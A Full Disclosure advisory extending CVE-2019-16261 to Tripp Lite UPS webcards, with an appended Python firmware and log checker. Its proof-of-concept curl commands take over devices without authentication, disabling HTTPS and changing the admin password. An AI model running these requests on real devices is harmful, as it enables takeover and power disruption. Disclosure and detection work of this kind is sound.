CVE-2019-16261 (UPDATE): Unauthenticated POST requests to Tripp Lite UPS Systems
This article describes a critical security vulnerability (CVE-2019-16261) in Tripp Lite UPS and PDU devices that allows unauthenticated users to control device functions through POST requests, including changing passwords and cutting power. The vulnerability affects multiple models and has been patched; upgrading the firmware is recommended to mitigate the risk. 2025-3-20 12:17:6 Author: seclists.org


Full Disclosure mailing list archives


From: Lucas Lalumière <lucas.lalum () gmail com>
Date: Mon, 17 Mar 2025 10:37:52 -0400

[Author]: Lucas Lalumiere
[Contact]: lucas.lalum () gmail com
[Date]: 2025-3-17
[Vendor]: Tripp Lite
[Product]: SU750XL UPS
[Firmware]: 12.04.0052
[CVE Reference]: CVE-2019-16261

============================
Affected Products (Tested):
============================
- Tripp Lite PDUs (e.g., PDUMH15AT)
- Tripp Lite UPSs (e.g., SU750XL)   *NEW*

======================
Vulnerability Summary:
======================
CVE-2019-16261 describes a critical vulnerability in the Tripp Lite
PDUMH15AT with firmware 12.04.0053, allowing unauthenticated users to send
POST requests to the `/Forms/` directory to:
- Change admin or manager passwords
- Shut off power to an outlet
- Disable/enable services

Through my own experimentation, I have discovered that this vulnerability
is also effective on Tripp Lite UPS systems, including my Tripp Lite
SU750XL, and applies to firmware 12.04.0052. This suggests the issue
extends beyond just PDUs, as mentioned in the CVE, to the network cards
equipped in Tripp Lite PDUs and UPSs (like my SNMPWEBCARD55) with
vulnerable firmware versions 12.04.0053 and below.

=========================
Proof of Concept (PoC):
=========================
These curl commands, similar to those provided originally by Jim Becher's
blog, are among those I've tested on the SU750XL.

1. Turning off Services (like HTTPS):
```
curl -X POST -d \
  "netweb_access=00000001&nethttp_access=00000001&nethttp_port=80&nethttps_access=00000000&nethttps_port=443&savechanges=Save+Changes" \
  http://[DEVICE_IP]/Forms/network_web_1

curl -X POST -d "startreset=Restart+PowerAlert" http://[DEVICE_IP]/Forms/requestreset_1
```

Result (PowerAlert terminal):
```
    System settings were changed.
    Initiating system shutdown procedure ... complete.
    The system is restarting now.

    ...

    SERVICES:
    HTTP    is enabled  on port 80
    HTTPS   is disabled on port 443
    SSH     is enabled  on port 22
    TELNET  is enabled  on port 23
    FTP     is enabled  on port 21
    SYSLOG  is enabled
```

2. Changing the Admin Password:
```
curl -X POST -d \
  "securityadu=newadmin&securityad1=admin&securityad2=admin&savechanges=Save+Changes" \
  http://[DEVICE_IP]/Forms/system_security_1

curl -X POST -d "startreset=Restart+PowerAlert" http://[DEVICE_IP]/Forms/requestreset_1
```

Result (PowerAlert terminal):
```
    System settings were changed.
    Initiating system shutdown procedure ... complete.
    The system is restarting now.

    ...

    Login: newadmin
    Password: *****
    Logged in as user newadmin
    $ _
```

=======
Impact:
=======
- High Availability Impact: Attackers can remotely control power functions,
affecting critical systems connected to the PDU/UPS.
- High Confidentiality Impact: Attackers can obtain admin access to all of
the device's information by changing its credentials.
- High Integrity Impact: Attackers can modify any configuration, either
directly through the POST requests or by using the changed admin credentials.

===============
Exploit Status:
===============
This vulnerability has already been patched in newer network card firmware
versions and acknowledged by Eaton. It was previously reported in
CVE-2019-16261 but was only attributed to Tripp Lite PDUMH15AT PDUs.

=======================
Recommended Mitigation:
=======================
Upgrade webcard firmware to the newest version. You can find the download
here:
 - https://tripplite.eaton.com/support/downloads?type=software&subtype=32
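As an added example (not part of this advisory or of any Tripp Lite/Eaton tooling), two defender-side checks that go with the mitigation above: a firmware version classifier for the vulnerable range the advisory reports (12.04.0053 and below), and a log scan that flags POSTs to the `/Forms/` endpoints named in the PoC from hosts outside a management allowlist. The log format, the proxy in front of the webcard, the sample lines and the allowlist are all constructed assumptions.

```python
import re
from typing import Iterable, List, Tuple

# Highest webcard firmware version the advisory reports as vulnerable (12.04.0053).
VULNERABLE_MAX = (12, 4, 53)

# /Forms/ endpoints named in the advisory's PoC.
SENSITIVE_FORMS = {
    "/Forms/network_web_1",      # enable/disable services such as HTTPS
    "/Forms/system_security_1",  # change admin/manager credentials
    "/Forms/requestreset_1",     # restart PowerAlert so the change takes effect
}

def parse_version(v: str) -> Tuple[int, ...]:
    """'12.04.0052' -> (12, 4, 52); zero padding is not significant."""
    parts = v.strip().split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        raise ValueError(f"unexpected firmware version: {v!r}")
    return tuple(int(p) for p in parts)

def is_vulnerable_firmware(v: str) -> bool:
    """True for 12.04.0053 and below, the range the advisory calls vulnerable."""
    return parse_version(v) <= VULNERABLE_MAX

# Common-log-format line from a proxy or IDS in front of the webcard (assumption:
# the card itself is not relied on to log; the format here is constructed).
CLF_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')

def find_suspect_form_posts(lines: Iterable[str], mgmt_allowlist: set) -> List[Tuple[str, str]]:
    """Return (source_ip, path) for POSTs to sensitive /Forms/ endpoints from hosts
    outside the management allowlist. Vulnerable firmware accepts these POSTs
    without authentication, so the source address is the only useful filter."""
    hits = []
    for line in lines:
        m = CLF_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        path = m["path"].split("?", 1)[0]
        if path in SENSITIVE_FORMS and m["ip"] not in mgmt_allowlist:
            hits.append((m["ip"], path))
    return hits

# Constructed sample log lines (not real traffic) and a constructed management host.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Mar/2025:10:37:52 -0400] "GET /status HTTP/1.1" 200 512',
    '10.0.0.99 - - [17/Mar/2025:10:38:01 -0400] "POST /Forms/network_web_1 HTTP/1.1" 200 128',
    '10.0.0.99 - - [17/Mar/2025:10:38:02 -0400] "POST /Forms/requestreset_1 HTTP/1.1" 200 64',
    '10.0.0.5 - - [17/Mar/2025:10:40:00 -0400] "POST /Forms/system_security_1 HTTP/1.1" 200 128',
]
MGMT_HOSTS = {"10.0.0.5"}
```

Running `find_suspect_form_posts(SAMPLE_LOG, MGMT_HOSTS)` over the sample flags only the two POSTs from 10.0.0.99; the management host's POST is allowed through by the allowlist.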

===========
References:
===========
- Original discovery:
https://blog.korelogic.com/blog/2019/08/19/unpatched_fringe_infrastructure_bits
- CVE-2019-16261:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16261

====================
Discoverer/Credits:
====================
 - Jim Becher, 2019-08-19

This disclosure is being submitted to expand upon the original CVE report,
adding additional affected products and detail. My finding confirms that both
Tripp Lite UPS and PDU devices equipped with optional network cards (e.g.
SNMPWEBCARD55) with firmware 12.04.0053 and 12.04.0052 are vulnerable.
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/


Source: https://seclists.org/fulldisclosure/2025/Mar/1